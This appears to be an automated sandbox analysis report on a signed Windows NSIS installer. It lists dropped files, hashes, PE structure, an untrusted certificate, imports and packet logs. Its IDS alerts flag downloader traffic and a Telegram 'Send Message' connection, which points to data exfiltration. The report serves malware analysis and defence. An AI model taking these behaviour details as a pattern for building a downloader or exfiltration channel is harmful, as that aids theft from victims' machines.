Preview:	Baggers lkkerbid klenskab provaccine pterygomalar,cunjah beruselse retroacting..skalpenes paiute ionisers tricephalus disassembling duvetinejakkerne stvnes,comminator macroanalysis tvangsarbejderne uncommones teinder histolaboranterne..uovertrffeligt postadolescences rosminianism salaminian ndvendiggrer linksmen nonadjudicated forslagsstillere compassions trachodon.Nonanalogicalness earlship snashes tjler ectasia..[tapping ledsagelse]..tartishly actinomycin unhearing pumpernikkelens udbasuner begravelsesmyndighed darlingness,oligopoly kantningers unseparate draperingens energiers verbalsubstantiv bemyndigelses..afmnstring slutsidens disadvised underernrer graanende fantasier,databasehaandtering alguifou calibrating homoeocrystalline aflggeren pashto..

C:\Users\user\AppData\Local\antinuke\Pennatilobate\sideformaternes.bep

Download File

Process:	C:\Users\user\Desktop\pkNnK2ya0f.exe
File Type:	VISX image file
Category:	dropped
Size (bytes):	1978873
Entropy (8bit):	0.1606332585898968
Encrypted:	false
SSDEEP:	3072:1a2cyoNa/etGZ0XxnDwNq5/0mSwLtN5qUdhbA0hkYcPdic/ZrcrNpjsDuILsldgC:8
MD5:	8E3711AED589CA1AEC74C84A1244B9DC
SHA1:	3C50B8CB18D5650A2D3482D1E1D2A69E6B18520C
SHA-256:	FA321A0A51FE062FC93146475E1D78C6D84ED3424A1B4198FD211718C55ED46C
SHA-512:	6C08CD5CA7B3F6B27C60D37A46A54E1E80FACB89E2BCFC65C14D048F14176057FD07E6651F70CED9538683E55F83B235F95AD4FA67D7952BBABC0BB705A95B9B
Malicious:	false
Preview:	UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUQUUUUUUUUU=UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUFUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU.UUUUUUUUUUUkUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU.UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU

C:\Users\user\AppData\Local\antinuke\Pennatilobate\stttevvets.txt

Download File

Process:	C:\Users\user\Desktop\pkNnK2ya0f.exe
File Type:	Generic INItialization configuration [bogbinderen ameerate]
Category:	dropped
Size (bytes):	395
Entropy (8bit):	4.3802964364391315
Encrypted:	false
SSDEEP:	12:RhA4KzFfGV0tXCl+rltzrznZ6uLqdGXWjAn:RiFfGVsXCl+pXVeAn
MD5:	EE11E45A27D83546111EBBE8D21E38CB
SHA1:	D6048EDDC8CB43F3E44A99C9B06D6D7726256ECD
SHA-256:	42AC1283DD9CF1797A410F913689E786E7EB7D3A39DD037DB9B8B38AE3493FF2
SHA-512:	4E4F0837EFFA11694A137E03ACE59F9089E7E514767DA81DAB9E595E6DB2088E69C77A9F8442A3969976AD66B9D1426064AC6EF126403B61B0B818F755B54DA8
Malicious:	false
Preview:	[fladeindholdets underdrying]..........fdevarekontrollerne semiconnection convects spanskrrenes pumpning.Dobbeltradedes beskyldt korfits metalskabets noodling forandrendes crocodilian neutraliserings udkradsende unhomogeneously straffesagerne..Bagbordssides tremulere pennatae overmultitude leonis,skoleridts vltet betydningsfuldeste polyhistory syltetjsmad adjunkturet..[bogbinderen ameerate]..

C:\Users\user\AppData\Local\antinuke\Pennatilobate\subaquatic.ini

Download File

Process:	C:\Users\user\Desktop\pkNnK2ya0f.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	472
Entropy (8bit):	4.264034571532917
Encrypted:	false
SSDEEP:	12:WSJ37pw37Xbhdj2rsW3TBmLZKmL+gxWx4CLt9:WSNpgddAsW3T6K8vwx4O
MD5:	4444EEF4C88EED0AF9C85282EA2DF5EB
SHA1:	2D8C93041492C2210993F600EE04567944578528
SHA-256:	C9465E727D47F3C042B9374CC16DB7A9A9FCAE96A933D21274D4D0683B18747A
SHA-512:	83C9AAB428CEADBDFB7DBF8B0C0C72A882872CA99D986ECEA9F4C7B1BA96A0FE9A157FFE1B69A51803F6AED1D6C31A90BD89B85C806AA6AD7E09C35D66ABAEA0
Malicious:	false
Preview:	dumpekandidater hyperaphia poorweed,ddbold durometres vilkaarenes splachnaceae iridiums....;interrogatively unpurposed generations luring,accessionernes svingplovs gastroenterological outpatient lata krabbers datarepraesentation..........kapelmusikeren reproduktionsanstalten haftarot foilsman parallelometer betydningsfuldes tenebricose microinstructions stadsskoleinspektrens obstruerede,omkrselsvejenes teleselskabernes tingsvidnes viklingernes sophies proletariseres..

C:\Users\user\AppData\Local\antinuke\Pennatilobate\syzygal.jpg

Download File

Process:	C:\Users\user\Desktop\pkNnK2ya0f.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 659x481, components 3
Category:	dropped
Size (bytes):	43794
Entropy (8bit):	7.951370977466451
Encrypted:	false
SSDEEP:	768:ptqg84TWkv+lXEm5qEOLCcLCtwtBNunbjvpNKTsLxZhG824+UejzF+KnsfMJ+QGo:ptqgTTWkwUscGtwtBNuXvPvhG8yjzrnr
MD5:	BDB5928244900790FB659F6BF15B93D3
SHA1:	D2FE708F46758FBB81EAE99DB33E92ABEC14053C
SHA-256:	6567138E6A432C818A4AD9A2DA940E6F49F643D2312D434B068FC4D5C17469F1
SHA-512:	91BF04CED2F7A9881CEBA407C8B453CE2EB7A44F440C8C9925E3B2818257D2158D4C83037FF76798207E1D6DDB7B5677805EC4FA72BB23F9E34416808A1AF165
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..q@..5B.zWM.s..H.3U...qWc...R.q\...=j.v.v.k...<.z .....J..v(.......P.QA.....iI..@..H_....g..C...R..I.....\.........#<.{].=k......&..23\...!..[.x}k...#<.=j.Q..3....Fj..N.w.I...)5....iui...EJ...9.Y.<.jh........4X).n......&E@.1..RnF..5..i.\|.SU.L.UdB:V.I.F....=jr..a\.4..j..h....bKr..&..U...i..2ez.p.SsY.ube.$..=.:.......$S.y..n....In.v..".3\.1.G.@..zP.@c...6.p.N.\.s

C:\Users\user\AppData\Local\antinuke\Pennatilobate\uninchoative.jpg

Download File

Process:	C:\Users\user\Desktop\pkNnK2ya0f.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 280x646, components 3
Category:	dropped
Size (bytes):	15740
Entropy (8bit):	7.899272096624211
Encrypted:	false
SSDEEP:	384:N7QulZeLI1NBCVRKt8l99iMRHByosz2RZOx5wmd:N7+M1NB2K+9iMRHINz2Rw5
MD5:	6800F8D7B2B4E02ED666E7E2B0183C71
SHA1:	86F18531B46A1B4AC7DA219D7C888FF2557BBFC3
SHA-256:	3486FFD468AD2337E19B997BA6DD2EF5247EBC26905B19B9E317F25880D4ECC0
SHA-512:	35792C711BD32F8252F865A7032048690E31EE12D14E699615014D202C7A3B368600483F6A584552C732B091B3727DC05CD7CDF5B70FB80EA87CFA37100A1C14
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(.......z..Q..t..<.D..CO..M.0.KE`...4.4...QHaJ))E..0u.X:...V.=+...O...`...V{...x............k..W.x.3;...}.\|...?...d.H.v...g_..(..\|...i........`...6.q..P`.....I...=F.....k...\|..{..\|1..5.kG:..Z..4.(.^[.3.....+..z,$yb.<..Ej..iEk....Y.(nfI.#.Tf..+.......7J.uN:5T..>.5W{r3.t..=...x.]P.jv..2m.ASEJ#1O.E\...2.....QE~l~.........*1O..7bd:.....oB..E).IX=..a

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.954605328938037
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	pkNnK2ya0f.exe
File size:	868'968 bytes
MD5:	a74d40a1da1722480a78d0794fb6ce9d
SHA1:	d484f36484580a3aaf3aadf0343c464880bab4ca
SHA256:	94e73ce7a276e8cc7b49c231a817a7f4c87e988b3ced91e56f452907e789687a
SHA512:	290026b15ad5209e9176571ca6c491c774a61435c4799048c427f51f4d4ac63a90570e982f2fa0e98aa01d4749729c2557f845512ad0d25903f6a107f779e8c4
SSDEEP:	24576:/gVcPEc8DdGZ5UNPlhZktUVZ3FXBRC8YXW:YcPr8DdFhZkO/9BRC8YX
TLSH:	20052356EB90C853D6CA6D7132560AB9CF578E24B848990F2F203EAF3C72571D82F547
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...~..Y.................f.........

File Icon


Icon Hash:	a5d56872428d9074

Static PE Info

General

Entrypoint:	0x403373
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x597FCC7E [Tue Aug 1 00:34:06 2017 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b34f154ec913d2d2c435cbd644e91687

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Genfdendes, E=Pile@Colourationally1.Ki, O=Genfdendes, L=Etzbach, OU="syndicalism Yengeese ", S=Rheinland-Pfalz, C=DE
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	15/11/2024 10:16:16 15/11/2025 10:16:16
Subject Chain	CN=Genfdendes, E=Pile@Colourationally1.Ki, O=Genfdendes, L=Etzbach, OU="syndicalism Yengeese ", S=Rheinland-Pfalz, C=DE
Version:	3
Thumbprint MD5:	E72F484C41FCB84B598EA8F47A014B4B
Thumbprint SHA-1:	8655CE87B64A8F367EB8C5A7066B28308F5CD4D3
Thumbprint SHA-256:	A42D65CB550D2B21FBFD511B6A3CD637B99C4E4A7F38EF3AD078756C29F969A1
Serial:	223721222F938ED010B6D18B64C70D18BE4B33A2

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+14h], ebx
mov dword ptr [esp+10h], 0040A2E0h
mov dword ptr [esp+1Ch], ebx
call dword ptr [004080A8h]
call dword ptr [004080A4h]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [00434EECh], eax
je 00007F7B9061FD33h
push ebx
call 00007F7B90622FC9h
cmp eax, ebx
je 00007F7B9061FD29h
push 00000C00h
call eax
mov esi, 004082B0h
push esi
call 00007F7B90622F43h
push esi
call dword ptr [00408150h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], 00000000h
jne 00007F7B9061FD0Ch
push 0000000Ah
call 00007F7B90622F9Ch
push 00000008h
call 00007F7B90622F95h
push 00000006h
mov dword ptr [00434EE4h], eax
call 00007F7B90622F89h
cmp eax, ebx
je 00007F7B9061FD31h
push 0000001Eh
call eax
test eax, eax
je 00007F7B9061FD29h
or byte ptr [00434EEFh], 00000040h
push ebp
call dword ptr [00408044h]
push ebx
call dword ptr [004082A0h]
mov dword ptr [00434FB8h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebx
push 0042B208h
call dword ptr [00408188h]
push 0040A2C8h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8608	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x62000	0x50b8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xd3410	0xe58
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x65ef	0x6600	a7ac317f30d043d93d4c5978f973de39	False	0.6750919117647058	data	6.514810500836391	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x149a	0x1600	966a3835fd2d9407261ae78460c26dcc	False	0.43803267045454547	data	5.007075185851696	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x2aff8	0x600	d113e76cc1b8c0774c4702688d79d792	False	0.5162760416666666	data	4.036693470004838	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x35000	0x2d000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x62000	0x50b8	0x5200	f06c9d9a101f31b63464971de77c7fb8	False	0.18102134146341464	data	2.9050976355040095	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x62298	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.10197095435684647
RT_ICON	0x64840	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.17659474671669795
RT_ICON	0x658e8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.21598360655737706
RT_ICON	0x66270	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.2703900709219858
RT_DIALOG	0x666d8	0x144	data	English	United States	0.5216049382716049
RT_DIALOG	0x66820	0x100	data	English	United States	0.5234375
RT_DIALOG	0x66920	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x66a40	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x66aa0	0x3e	data	English	United States	0.8064516129032258
RT_VERSION	0x66ae0	0x294	OpenPGP Secret Key	English	United States	0.5212121212121212
RT_MANIFEST	0x66d78	0x340	XML 1.0 document, ASCII text, with very long lines (832), with no line terminators	English	United States	0.5540865384615384

Imports

DLL	Import
KERNEL32.dll	SetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll	GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
ADVAPI32.dll	AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Version Infos

Description	Data
Comments	idiotsikres prespecializes sejlgarnsnglerne
CompanyName	saltekarret moselov dieters
FileDescription	boulevarderne
LegalCopyright	strangulation garua digelen
ProductName	taks afskiller coevals
Translation	0x0409 0x04e4

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-07T20:44:04.862004+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.10	49689	172.217.16.142	443	TCP
2025-03-07T20:44:12.095316+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.10	49691	132.226.247.73	80	TCP
2025-03-07T20:44:16.486047+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.10	49691	132.226.247.73	80	TCP
2025-03-07T20:44:18.729650+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.10	49693	104.21.32.1	443	TCP
2025-03-07T20:44:19.501723+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.10	49694	132.226.247.73	80	TCP
2025-03-07T20:44:22.470460+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.10	49696	132.226.247.73	80	TCP
2025-03-07T20:44:44.057803+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.10	49708	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 7, 2025 20:44:02.142838955 CET	49689	443	192.168.2.10	172.217.16.142
Mar 7, 2025 20:44:02.142995119 CET	443	49689	172.217.16.142	192.168.2.10
Mar 7, 2025 20:44:02.143090010 CET	49689	443	192.168.2.10	172.217.16.142
Mar 7, 2025 20:44:02.153464079 CET	49689	443	192.168.2.10	172.217.16.142
Mar 7, 2025 20:44:02.153503895 CET	443	49689	172.217.16.142	192.168.2.10
Mar 7, 2025 20:44:04.040236950 CET	443	49689	172.217.16.142	192.168.2.10
Mar 7, 2025 20:44:04.040745974 CET	49689	443	192.168.2.10	172.217.16.142
Mar 7, 2025 20:44:04.041337013 CET	443	49689	172.217.16.142	192.168.2.10
Mar 7, 2025 20:44:04.041486979 CET	49689	443	192.168.2.10	172.217.16.142
Mar 7, 2025 20:44:04.103645086 CET	49689	443	192.168.2.10	172.217.16.142
Mar 7, 2025 20:44:04.103765965 CET	443	49689	172.217.16.142	192.168.2.10
Mar 7, 2025 20:44:04.104244947 CET	443	49689	172.217.16.142	192.168.2.10
Mar 7, 2025 20:44:04.104348898 CET	49689	443	192.168.2.10	172.217.16.142
Mar 7, 2025 20:44:04.107142925 CET	49689	443	192.168.2.10	172.217.16.142
Mar 7, 2025 20:44:04.148364067 CET	443	49689	172.217.16.142	192.168.2.10
Mar 7, 2025 20:44:04.862082958 CET	443	49689	172.217.16.142	192.168.2.10
Mar 7, 2025 20:44:04.862200975 CET	443	49689	172.217.16.142	192.168.2.10
Mar 7, 2025 20:44:04.862319946 CET	49689	443	192.168.2.10	172.217.16.142
Mar 7, 2025 20:44:04.862498999 CET	49689	443	192.168.2.10	172.217.16.142
Mar 7, 2025 20:44:04.864401102 CET	49689	443	192.168.2.10	172.217.16.142
Mar 7, 2025 20:44:04.864423037 CET	443	49689	172.217.16.142	192.168.2.10
Mar 7, 2025 20:44:04.891045094 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:04.891082048 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:04.891354084 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:04.891608000 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:04.891614914 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:06.755321980 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:06.755491972 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:06.771923065 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:06.771991968 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:06.773052931 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:06.773144960 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:06.783858061 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:06.824335098 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:09.840934992 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:09.841166019 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:09.854192019 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:09.854366064 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:09.860869884 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:09.860981941 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:09.883852959 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:09.883898020 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:09.883960009 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:09.883996010 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:09.884016037 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:09.884044886 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:09.930686951 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:09.930762053 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:09.930805922 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:09.930845022 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:09.930845022 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:09.930876970 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:09.930905104 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:09.930919886 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:09.937374115 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:09.937463999 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:09.937489033 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:09.937534094 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:09.940790892 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:09.940871000 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:09.940891981 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:09.940937042 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:09.947559118 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:09.947616100 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:09.947638988 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:09.947679996 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:09.954394102 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:09.954484940 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:09.954508066 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:09.954560041 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:09.961344004 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:09.961426020 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:09.961447954 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:09.961491108 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:09.968993902 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:09.969096899 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:09.969120026 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:09.969162941 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:09.975586891 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:09.975672007 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:09.975694895 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:09.975742102 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:09.982865095 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:09.982980967 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:09.983010054 CET	443	49690	172.217.18.97	192.168.2.10
Mar 7, 2025 20:44:09.983057022 CET	49690	443	192.168.2.10	172.217.18.97
Mar 7, 2025 20:44:09.989609957 CET	443	49690	172.217.18.97	192.168.2.10
